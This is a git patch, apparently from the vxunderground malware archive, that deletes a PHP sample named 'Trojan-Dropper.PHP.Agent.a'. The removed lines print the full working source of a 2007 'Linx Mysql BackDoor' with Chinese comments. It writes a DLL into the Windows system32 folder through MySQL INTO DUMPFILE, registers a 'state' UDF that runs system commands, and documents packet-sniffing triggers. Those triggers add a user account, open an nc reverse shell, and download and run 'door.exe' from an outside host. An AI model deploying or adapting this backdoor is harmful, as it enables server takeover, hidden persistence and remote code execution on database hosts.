From 7e61a0e6f7f795a32814ca002aa8c2ac3a46c500 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Mon, 2 Nov 2020 23:41:35 -0600
Subject: [PATCH] Delete Trojan-Dropper.PHP.Agent.a
---
PHP/Trojan-Dropper.PHP.Agent.a | 156 ---------------------------------
1 file changed, 156 deletions(-)
delete mode 100644 PHP/Trojan-Dropper.PHP.Agent.a
diff --git a/PHP/Trojan-Dropper.PHP.Agent.a b/PHP/Trojan-Dropper.PHP.Agent.a
deleted file mode 100644
index 151245c8..00000000
--- a/PHP/Trojan-Dropper.PHP.Agent.a
+++ /dev/null
@@ -1,156 +0,0 @@
-Mysql-cmd /c net user abc /add>c:/log.txt! (最后的"!"不能省略)
-2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082,再nc ip 80->Mysql-c- (最后的"-"不能省略)
-3.让服务器下载文件:nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
-注意:后门只嗅探以"Mysql-"开头的数据包,这样是为了占有更少的系统资源.
--->
-*/
-error_reporting(0);
-extract($_POST);
-extract($_GET);
-$action="mysql";
-$mysql_hostname=$mysql_hostname?$mysql_hostname:"127.0.0.1";
-$mysql_username=$mysql_username?$mysql_username:"root";
-$post_sql=$post_sql?$post_sql:"select state(\"net user\")";
-$mysql_dbname=$mysql_dbname?$mysql_dbname:"mysql";
-
-if($install){
- $link = mysql_connect ($mysql_hostname,$mysql_username,$mysql_passwd) or die(mysql_error());
- mysql_select_db($mysql_dbname,$link) or die(mysql_error());
-
- @mysql_query("DROP TABLE udf_temp", $link);
- //@mysql_query("drop function state", $link);
-
-
- $query="CREATE TABLE udf_temp (udf BLOB);";
- if(!($result=mysql_query($query, $link)))
- die('错误:创建临时表udf_temp出错。'.mysql_error());
- else
- {
- $code=get_code();
- $query="INSERT into udf_temp values (CONVERT($code,CHAR));";
- if(!mysql_query($query, $link))
- {
- mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
- die('错误:插入DLL数据出错。'.mysql_error());
- }
- else
- {
- $dllname="mysqlDll.dll";
- if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll";
- elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll";
-
- if(file_exists($dir)) {
- $time=time();
- $dir=str_replace("mysqlDll","mysqlDll_$time",$dir);
- $dllname=str_replace("mysqlDll","mysqlDll_$time",$dllname);
- }
-
- $query="SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ;
- //echo $query;
- if(!mysql_query($query, $link))
- {
- //mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
- die("导出DLL文件出错:可能无权限或者 $dir 已经存在。".mysql_error());
- }
- else
- {
- echo 'DLL已成功的导出到'.$dir.'
';
- }
- }
- mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error());
- $result=mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error());
- if($result) {
- echo "MysqlDoor安装成功!
返回";
- exit();
- }
- }
-
-}
-
-?>
-
-
-Linx Mysql Door
-
返回信息:
-
-
-
-
-
-
--Linx Mysql BackDoor
--2007.6.9
-
-填写Mysql的管理员密码,点击"自动安装MysqlDoor"后,将会在Mysql上增加"state"函数,同时利用Mysql进程运行基于嗅探的后门.
-
-语句参考:
- 执行:select state("net user");
- 卸载:drop function state;
-注意:运行"drop function state;"后会使mysql退出,重启后恢复正常。
-
-运行命令:
- nc ip 80->Mysql-c- (反向连接20082端口)
- nc ip 80->Mysql-cmd /c net user abc /add>c:/log.txt!
- nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
-注意:后门只嗅探以"Mysql-"开头的数据包,这样是为了占有更少的系统资源.
-
-
-
-
-
-